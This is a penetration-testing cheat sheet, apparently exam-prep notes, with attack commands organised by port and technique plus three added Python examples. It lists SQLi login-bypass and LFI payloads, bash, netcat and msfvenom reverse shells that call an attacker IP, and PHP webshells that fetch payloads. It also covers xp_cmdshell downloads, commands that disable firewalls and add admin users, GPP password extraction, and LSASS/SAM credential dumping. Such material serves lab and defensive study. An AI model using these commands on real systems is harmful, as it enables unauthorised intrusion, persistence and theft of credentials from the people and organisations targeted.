I've been a bit busy with a new schedule. Please bear with me as some of the items below are not yet updated.

7/28/18: Fixed content bugs

PORTS

21/990: FTP
Nmap: Anonymous FTP
About: Check whether the server accepts the anonymous account (any password works) using nmap's ftp-anon script. Anonymous access may give read, and sometimes write, access to the whole FTP directory tree
Usage: nmap -p21 --script=ftp-anon.nse (IP)


Metasploit: FTP anonymous scanner
About: The same anonymous-login check done from Metasploit rather than nmap, handy when you are already working inside msfconsole
Usage: msfconsole> use auxiliary/scanner/ftp/anonymous


Metasploit: FTP login scanner
About: Brute force FTP logins with username and password lists. FTP access can sometimes lead to privilege escalation or expose credentials left behind in logs or config files by a previous user
Usage: msfconsole> use auxiliary/scanner/ftp/login
 

Tips
Check xml, ini, log, and txt files for user passwords/hashes. Passwords and user logs are often left inside of these files which may lead to web or SSH access.
22: SSH
Hydra: Manual password bruteforcing
  • Flags:
    -l (single username) or -L (username list)
    -p (single password) or -P (password list)
    -t (number) - number of parallel connections per target (default 16); lower it for SSH, which drops logins when too many arrive at once (-t 4 is the usual choice)
    -f - stop the scanner once a valid username and password combo is found
    -v - verbosity mode (displays any extra output during the scan)
  • Example:
    hydra -l username -P password_list.txt 192.168.168.168 -f -v ssh
     
Tips
Use in conjunction with the cewl utility to grab possible names and passwords from a website (cewl usage can be found in the port 80 section below)
80/443/8080: HTTP/HTTPS/WebDAV
Dirb
About: Brute forces directory and file names against a web server with a wordlist (uses its own common.txt by default)
Usage: dirb http://192.168.168.168
Gobuster
About: Same job as dirb, written in Go and considerably faster; -s filters on status codes and -e prints full URLs
Usage: gobuster -u http://192.168.168.168/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -s 200,204,301,302,307,403,500 -e
Nikto
About: Web server scanner for known dangerous files, outdated software and misconfigurations; noisy, so run it after the quieter checks
Usage: nikto -h 192.168.168.168 -p (port), nikto -h www.website.com
Curl
About: Command-line HTTP client for fetching single pages and poking at parameters (quote the URL so the shell does not treat & as a background operator)
Usage: curl 'http://192.168.168.168/admin.php?action=users&login=0'
Cewl
About: Spiders a site and builds a wordlist from the words found on it; -m is the minimum word length, -w the output file
Usage: cewl http://192.168.168.168/index.html -m 2 -w cewl.lst
Davtest
About: Tests a WebDAV-enabled directory by uploading test files of each extension and reporting which ones the server executes
Usage: davtest -url http://(target IP) - will display what is executable
Cadaver
About: Command-line WebDAV client for browsing, uploading and deleting files once DAV is confirmed
Usage: cadaver http://(target IP), then run "ls" to list directories found
HTTP
  • Quick folder enumeration: nmap --script http-enum.nse -p80 192.168.168.168 (the script is in /usr/share/nmap/scripts/)
  • SQLi login bypass, MySQL comment syntax (the quote closes the username literal, or 1=1 makes the WHERE clause true for every row, # discards the password check):
    admin' or 1=1;#
    admin' or 1=1 #
    with a found username: username' or 1=1 #
  • LFI: http://192.168.168.168/search.php?id=../../../../../../../../../etc/passwd <-- when the parameter reaches include()/require() rather than a plain file read, a PHP file is executed instead of displayed, so replace /etc/passwd with an uploaded payload such as /upload/directory/blackwinter.php
Tips

  • PHP pages: Check for the presence of common php default pages and folders such as:
    /phpliteadmin
    /dashboard
    /admin
    /admin.php
    /login
    /login.php
  • If PHP is found, check the phpinfo.php file. On occasion hidden credentials will be located at the very bottom of the page
  • Check the /robots.txt file for hidden folders
  • Look for comments in the HTML source code. Programmers sometimes stick usernames, passwords, and other hints in there that may give you a way into the box
137/139/445: NetBIOS/SMB
Enum4linux
About: Wraps the Samba tools to pull users, shares, groups, password policy and OS info over null sessions
Usage: enum4linux 192.168.168.168 - add -U to grab the user list, -a to run every check
Smbclient
About: Samba command-line client; -N skips the password prompt (null session), -L lists shares
Usage: smbclient -N -L 192.168.168.168 - lists smb type (often displaying samba version) and the available shares
Acccheck
About: Password dictionary attack against SMB that tries each username/password pair against the IPC$ and ADMIN$ shares (this is acccheck, the Samba attack script; not Sysinternals accesschk, which lists Windows ACLs)
Usage: acccheck -v -t (target IP) -u user -P /usr/share/dirb/wordlists/common.txt
NetBIOS/SMB
  • nmap 192.168.168.168 --script "smb-vuln*" (quote the glob so the shell does not expand it; the scripts live in /usr/share/nmap/scripts/smb-vuln*.nse)
Tips
Placeholder text
161: SNMP (UDP)
Snmpwalk
About:
Usage: snmpwalk -c public -v1 192.168.168.168 - SNMP listens on UDP 161, so a TCP-only port scan will not show it (nmap -sU -p161 does). public is the default read-only community string, private the usual read-write one
Tips
Placeholder text
3306: MySQL
MySQL
  • SQL commands: select sys_exec('/bin/bash');
    sys_exec() is not built in: it comes from the lib_mysqludf_sys UDF and has to be loaded first. It runs the command as the MySQL service account, so this only gives root when MySQL itself runs as root (common on old lab boxes)
  • escalation: bash -p or sudo su
    (bash -p keeps the effective uid when the binary is SUID; the usual pattern is to have sys_exec copy /bin/bash somewhere and set the SUID bit on the copy, then run that copy with -p)
  • sqsh program (command-line client for Microsoft SQL Server over TDS, default port 1433; this part is not for MySQL): apt-get install sqsh freetds-bin freetds-common freetds-dev
  • usage:
    add to the bottom of /etc/freetds/freetds.conf (the section name is what sqsh -S refers to):
    [hostname]
        host = 192.168.168.169
        port = 2600
        tds version = 8.0

edit ~/.sqshrc:
\set username=sa
\set password=password
\set style=vert
connect: sqsh -S hostname

Tips
Placeholder text

 

Tools/Techniques

PHP
Reverse shells
  • One line (this is a bash reverse shell, not PHP; run it from a web shell through system() or exec()): /bin/bash -i > /dev/tcp/192.168.168.169/443 0<&1 2>&1
  • MSFvenom syntax: msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.168.168 LPORT=443 -f raw > revshell.php (R is the older spelling of -f raw)
Execution through PHP webshell
  • <?php echo (`whoami`); ?>
  • <?php echo (`ls -l /tmp/`); ?>
  • <?php echo `ifconfig`; ?>
  • <?php echo `wget -O /upload/directory/payload.php http://192.168.168.168/blackwinter.php`; ?>
  • <?php echo shell_exec("fetch -o /upload/directory/payload.php http://192.168.168.168/blackwinter.php"); ?>
Tips
Shells
Breaking out of shells
  • Non-interactive shells
    to break out of non-interactive mode, write a small script somewhere writable such as /tmp and run it:
    echo "import pty; pty.spawn('/bin/bash')" > /tmp/test.py
    python /tmp/test.py
  • upgrade non-tty to tty: python -c 'import pty;pty.spawn("/bin/sh")'
  • Escape limited shell - from a reachable Python interpreter (a restricted shell that still runs python, or an application that exposes a Python prompt):
    import os; os.system('/bin/sh') OR import os; os.system('/bin/bash')
    (typing echo os.system('/bin/sh') at a bash prompt only prints the text; the call has to run inside Python)
  • Escape limited shell - Python, capturing output when no tty is available:
    exit_code = os.system('/bin/sh')
    output = os.popen('id').read() (os.open returns a file descriptor, not a pipe; os.popen is the call that runs a command and reads its output)
Kali webshells
  • /usr/share/webshells/php/php-reverse-shell.php
  • /usr/share/webshells/cfm/cfexec.cfm
  • /usr/share/webshells/perl/perl-reverse-shell.pl
ASP
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.168.168 LPORT=443 -f asp -o shell.asp - for ASP.NET use -f aspx -o shell.aspx
Reverse connections
  • Windows: build a PowerShell script from cmd.exe, one echo per line, that starts nc.exe under another user's credentials (the Process.Start overload takes file, arguments, user name, SecureString password and domain):
    echo $secpasswd = ConvertTo-SecureString "password" -AsPlainText -Force > wget-runas.ps1
    echo $mycreds = New-Object System.Management.Automation.PSCredential ("username", $secpasswd) >> wget-runas.ps1
    echo $computer = "hostname" >> wget-runas.ps1
    echo [System.Diagnostics.Process]::Start("C:\tmp\nc.exe","192.168.168.168 443 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer) >> wget-runas.ps1
    powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget-runas.ps1
  • Linux (from Python): os.system('nc 192.168.168.168 443 -e /bin/sh') - -e needs nc.traditional or ncat; the OpenBSD netcat shipped by many distros does not have it
  • Windows, bind shell (listener on the target, connect to it from the attacker): nc -nlvp 443 -e cmd.exe
Firewall
Linux: Disable firewall
  • systemctl stop firewalld
  • iptables -F (flushes the rules but leaves the chain default policies in place; if a policy is DROP the host stays unreachable until that policy is set to ACCEPT)
Windows: Disable firewall
  • Check firewall state: netsh firewall show state
  • Check from a PHP web shell: system('netsh firewall show state');
  • Turn firewall off (Vista and later): netsh advfirewall set allprofiles state off
  • Turn firewall off (legacy netsh firewall context, XP/2003): netsh firewall set opmode disable
Tips
RDP
Enable RDP through the command line
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
(fDenyTSConnections = 0 is the documented switch; the firewall also has to let TCP 3389 through, the "remote desktop" rule group in netsh advfirewall, unless it was disabled above)
if terminal services are disabled: sc config TermService start= "demand"
net start TermService
Share a local directory into the RDP session
rdesktop -u username -p password -r disk:share=/home//Desktop 192.168.168.168 (the path is on the attacking box and shows up as a drive inside the session, handy for copying tools over)
Add users
Windows: net user username password /add
net localgroup Administrators username /add
net localgroup "Remote Desktop Users" username /add
Tips
SQL
Execution
Check files
1> exec master..xp_cmdshell 'type c:\"Documents and Settings"\Administrator\Desktop\proof.txt'
2> go
Upload and connect to reverse shell
xp_cmdshell is disabled by default on SQL Server 2005 and later; a sysadmin login has to enable it first through sp_configure ('show advanced options', then 'xp_cmdshell', each followed by RECONFIGURE)
1> EXEC master..xp_cmdshell 'tftp -i 192.168.168.168 GET nc.exe'
2> go
(needs a TFTP server on the attacking box serving nc.exe, and the tftp client on the target, which is not installed by default since Vista)
Reconnect with explicit credentials: sqsh -S hostname -Uusername -Ppassword
Bind shell (listener on the target, then connect to it from the attacker):
1> EXEC master..xp_cmdshell 'nc -nlvp 443'
2> go
Reverse shell (start nc -nlvp 443 on the attacker first):
1> EXEC master..xp_cmdshell 'nc -nv 192.168.168.168 443 -e cmd'
2> go
Output a table
1> use database;
2> go
1> select * from tblTable;
2> go
MySQL
select sys_exec('/bin/bash');
after bash access, "bash -p" or "sudo su"
Injection
admin' or 1=1;#
admin' or 1=1 #
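Why the login-bypass payload listed here (and in the HTTP section above) works, as an added example that is not part of the original notes. It runs against an in-memory SQLite database; the users table, the two accounts and the login functions are constructed for illustration. SQLite only understands the `-- ` line comment, so the MySQL-only `#` from the notes is written as `-- `; the mechanics are the same.

```python
"""Vulnerable string-built login beside its parameterised fix.

Added example, not from the original cheat sheet. Table contents and
credentials below are constructed sample data.
"""
import sqlite3
from typing import Optional

PAYLOAD = "admin' or 1=1 -- "      # MySQL spelling from the notes: admin' or 1=1 #


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one admin account and one ordinary user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "Str0ngPassw0rd!"), ("bob", "hunter2")])
    return conn


def build_query(username: str, password: str) -> str:
    """The string concatenation a vulnerable login page does."""
    return ("SELECT username FROM users WHERE username = '%s' "
            "AND password = '%s'" % (username, password))


def login_vulnerable(conn: sqlite3.Connection, username: str,
                     password: str) -> Optional[str]:
    """Runs the concatenated query. With the payload, the attacker's quote
    closes the username literal, 'or 1=1' makes the WHERE clause true for
    every row, and the comment marker discards the password check, so the
    first row (admin) comes back whatever password was typed."""
    row = conn.execute(build_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str,
               password: str) -> Optional[str]:
    """Parameterised query: the driver passes the payload as data, so the
    quote and comment characters never reach the SQL parser."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print(build_query(PAYLOAD, "anything"))
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "anything"))  # admin
    print("safe:      ", login_safe(db, PAYLOAD, "anything"))        # None
```

Print the built query when a payload does not work as expected: seeing where the quote lands usually explains which comment marker or quoting variant the target dialect needs.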
Tips
File Transfer
Execution from a PHP web shell (pull the payload from a web server on the attacking box):
<?php echo `wget -O /upload/directory/payload.php http://192.168.168.168/blackwinter.php`; ?>
<?php echo shell_exec("fetch -o /upload/directory/payload.php http://192.168.168.168/blackwinter.php"); ?>
Other transfer channels: fetch (BSD), ftp, tftp
Check which HTTP methods an upload path accepts, then PUT a file if PUT is allowed:
nmap 192.168.168.168 -p80 --script http-methods --script-args http-methods.url-path='/upload_path'
nmap 192.168.168.168 -p80 --script http-put --script-args http-put.url='/upload_path/reverse_shell.php',http-put.file='/blackwinter.php'
Wget: wget http://192.168.168.168/blackwinter.php (any file served from the attacker's web root)
Powershell
  • Upload netcat to the victim:

  • Run reverse netcat connection and connect to attacker:
    Code courtesy of badc0d3

Tips
Password and Hash Cracking
Identify hashes: hash-identifier
About: Identify types of hashes (only identifies, does not crack)
Usage: hash-identifier, then paste in hash
 

Unshadow
unshadow password_file shadow_file > new_password_list
Crack hashes: John the ripper
About: Used to crack different types of hashes (use with a wordlist for better results)
Usage:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256 password_list
(pass --format only when auto-detection guesses wrong: Raw-SHA256 is for bare hex SHA-256 hashes; for an unshadow file leave it off, or name the scheme the $id$ prefix indicates, e.g. sha512crypt or md5crypt)
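What unshadow produces and how the `$id$` prefix tells you the hash type before john runs, as an added example covering the hash-identifier, unshadow and john entries above (not code from the original notes). The passwd and shadow lines are constructed samples in the real file layout; the hash values are format-valid but stand for no real account, and the scheme names in CRYPT_IDS are the crypt(5) identifiers, which are also john's format names.

```python
"""Merge passwd+shadow like unshadow(8) and identify each hash by its prefix.

Added example, not from the original cheat sheet. PASSWD and SHADOW are
constructed sample files.
"""
from typing import Dict, List, Optional

PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
"""
SHADOW = """\
root:$6$saltsalt$IxDD3jeSOb5eB1NXkyrMbQ9MHXEgEaiCoN6mJLOZ9j1.9gRdMXsyjVVNEN3R1uFB5yO7p1Y6Jk5VHyR1fWc4p0:17000:0:99999:7:::
daemon:*:17000:0:99999:7:::
alice:$1$saltsalt$qJH7.N4xYta3aEG/dfqo/0:17000:0:99999:7:::
"""

# crypt(5) ids -> scheme; these double as john --format names.
CRYPT_IDS: Dict[str, str] = {
    "1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt",
}


def identify(hash_field: str) -> Optional[str]:
    """Scheme for one shadow hash field, or None when there is nothing to crack."""
    if not hash_field or hash_field[0] in "*!":
        return None                       # locked or passwordless account
    if hash_field.startswith("$"):
        return CRYPT_IDS.get(hash_field.split("$")[1], "unknown")
    if len(hash_field) == 13:
        return "descrypt"                 # traditional DES: 2-char salt + 11
    return "unknown"


def unshadow(passwd: str, shadow: str) -> List[str]:
    """Replace the 'x' in each passwd line with the hash from shadow, the
    combined line format john expects (user:hash:uid:gid:gecos:home:shell)."""
    hashes: Dict[str, str] = {}
    for line in shadow.splitlines():
        if line and ":" in line:
            user, hash_field = line.split(":", 2)[:2]
            hashes[user] = hash_field
    merged = []
    for line in passwd.splitlines():
        if not line or ":" not in line:
            continue
        fields = line.split(":")
        fields[1] = hashes.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return merged


def crackable(merged: List[str]) -> Dict[str, str]:
    """user -> scheme for every merged line with a real hash; locked accounts
    are dropped, which is what john does silently when it loads the file."""
    out: Dict[str, str] = {}
    for line in merged:
        user, hash_field = line.split(":", 2)[:2]
        scheme = identify(hash_field)
        if scheme:
            out[user] = scheme
    return out


if __name__ == "__main__":
    lines = unshadow(PASSWD, SHADOW)
    print("\n".join(lines))
    print(crackable(lines))   # {'root': 'sha512crypt', 'alice': 'md5crypt'}
```

A file that mixes schemes makes john ask which format you meant; feed it the output of crackable() one scheme at a time, or pass the scheme name as --format.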
 

Bruteforce: Hydra
hydra -l (found_name) -P password.lst 192.168.168.168 ssh
hydra -L username_list.txt -P password_list.txt 192.168.168.168 ssh -t 4
Misconfigured AD (Group Policy Preferences passwords)
net use z: \\(target_hostname)\SYSVOL (any domain user can read SYSVOL)
z:
dir /s Groups.xml
type Z:\local.domain\Policies\{84583021-C460-486C-83E1-FA1EC8CA84FC}\Machine\Preferences\Groups\Groups.xml
gpp-decrypt SvtusBQWJgAFrFPTyPH9clizXPQBDqDDGzlSDxKogcz - pass it the value of the cpassword attribute; the cleartext password is printed (the AES key is public, so any cpassword anywhere in SYSVOL is as good as plaintext)
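The step between `dir /s Groups.xml` and gpp-decrypt, as an added example that is not part of the original notes: walk a mounted or copied SYSVOL, pull every cpassword out of the preference files that can carry one, and restore the base64 padding GPP strips so the value can be handed to a decryptor. SAMPLE_GROUPS_XML is a constructed file in the layout GPP writes (GUIDs, account name and cpassword are made up), and GPP_AES_KEY is the published Microsoft key that gpp-decrypt uses; the decryption itself is left to gpp-decrypt.

```python
"""Find GPP cpassword values under SYSVOL and prepare them for decryption.

Added example, not from the original cheat sheet. SAMPLE_GROUPS_XML is a
constructed sample; no real domain data is embedded.
"""
import base64
import os
import xml.etree.ElementTree as ET
from typing import Iterator, List, Tuple

# Preference files that can carry a cpassword attribute, not only Groups.xml.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Printers.xml", "Drives.xml"}
# The attribute naming the account differs between preference types.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")

# Published AES-256 key (MSDN) used by every GPP cpassword: AES-CBC, zero
# IV, plaintext is the password in UTF-16LE. gpp-decrypt embeds the same key.
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")

SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="svc_backup" image="2"
        changed="2018-07-01 10:00:00" uid="{11111111-2222-3333-4444-555555555555}">
    <Properties action="U" newName="" fullName="" description="backup service"
        cpassword="AzVJmXh/YRNqmcJsp1+uQ7Kpb8gnsYLe8yNC5Q0tXZI"
        changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
        userName="svc_backup"/>
  </User>
</Groups>
"""


def extract_cpasswords(xml_text: str) -> List[Tuple[str, str]]:
    """(account, cpassword) for every element in the file that carries one."""
    found = []
    for elem in ET.fromstring(xml_text).iter():
        cp = elem.get("cpassword")
        if not cp:
            continue
        account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "?")
        found.append((account, cp))
    return found


def fix_padding(cpassword: str) -> bytes:
    """GPP drops the base64 '=' padding; restore it before decoding. The
    result is the raw AES ciphertext, always a multiple of 16 bytes."""
    padded = cpassword + "=" * (-len(cpassword) % 4)
    return base64.b64decode(padded)


def walk_sysvol(root_dir: str) -> Iterator[Tuple[str, str, str]]:
    """Yield (path, account, cpassword) for every GPP file under root_dir,
    e.g. a mounted \\\\dc\\SYSVOL or a copy pulled down with smbclient."""
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if name in GPP_FILES:
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8-sig") as fh:   # GPP files often carry a BOM
                    for account, cp in extract_cpasswords(fh.read()):
                        yield path, account, cp


if __name__ == "__main__":
    for account, cp in extract_cpasswords(SAMPLE_GROUPS_XML):
        print(f"{account}: cpassword={cp} ({len(fix_padding(cp))} bytes of ciphertext)")
```

Run walk_sysvol() over the whole Policies tree rather than grepping for Groups.xml alone: scheduled tasks, services and drive maps carry the same attribute and are missed by the `dir /s Groups.xml` search.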
Credential dumping: WCE32/WCE64
About: wce32.exe (wce64.exe) reads logon credentials out of LSASS memory: NTLM hashes by default, cleartext passwords with -w. It dumps, it does not crack
Usage: wce32.exe -w (wce64.exe -w)


Credential dumping: FGdump
About: fgdump.exe dumps the local SAM password hashes in pwdump format. It uses the IPC$ share to connect and additionally attempts to disable antivirus that may be running on the host. The hashes still have to be cracked with john or reused with pass-the-hash
Usage: fgdump.exe, then "type 127.0.0.1.pwdump"



Credential dumping: PWdump
About: pwdump.exe dumps the local SAM hashes like FGdump but without the added bonus of disabling antivirus, which would need to be done before running the program
Usage: pwdump.exe (host)
 

 
Tips
Online hash crackers: